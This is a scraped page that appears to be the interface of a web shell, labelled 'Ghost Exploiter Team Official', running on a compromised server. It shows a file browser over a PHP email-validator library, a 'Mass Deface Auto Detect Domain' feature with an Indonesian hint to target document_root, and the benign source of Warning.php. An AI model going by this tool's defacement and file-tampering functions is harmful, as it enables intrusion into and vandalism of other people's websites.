Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
egulias
/
email-validator
/
src
/
Warning
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AddressLiteral.php
0.252KB
edt
ren
CFWSNearAt.php
0.223KB
edt
ren
CFWSWithFWS.php
0.238KB
edt
ren
Comment.php
0.211KB
edt
ren
DeprecatedComment.php
0.212KB
edt
ren
DomainLiteral.php
0.235KB
edt
ren
EmailTooLong.php
0.286KB
edt
ren
IPV6BadChar.php
0.25KB
edt
ren
IPV6ColonEnd.php
0.261KB
edt
ren
IPV6ColonStart.php
0.265KB
edt
ren
IPV6Deprecated.php
0.245KB
edt
ren
IPV6DoubleColon.php
0.256KB
edt
ren
IPV6GroupCount.php
0.251KB
edt
ren
IPV6MaxGroups.php
0.27KB
edt
ren
LocalTooLong.php
0.309KB
edt
ren
NoDNSMXRecord.php
0.261KB
edt
ren
ObsoleteDTEXT.php
0.253KB
edt
ren
QuotedPart.php
0.594KB
edt
ren
QuotedString.php
0.348KB
edt
ren
TLD.php
0.19KB
edt
ren
Warning.php
0.769KB
edt
ren
<?php namespace Egulias\EmailValidator\Warning; abstract class Warning { /** * @var int CODE */ public const CODE = 0; /** * @var string */ protected $message = ''; /** * @var int */ protected $rfcNumber = 0; /** * @return string */ public function message() { return $this->message; } /** * @return int */ public function code() { return self::CODE; } /** * @return int */ public function RFCNumber() { return $this->rfcNumber; } /** * @return string */ public function __toString(): string { return $this->message() . " rfc: " . $this->rfcNumber . "internal code: " . static::CODE; } }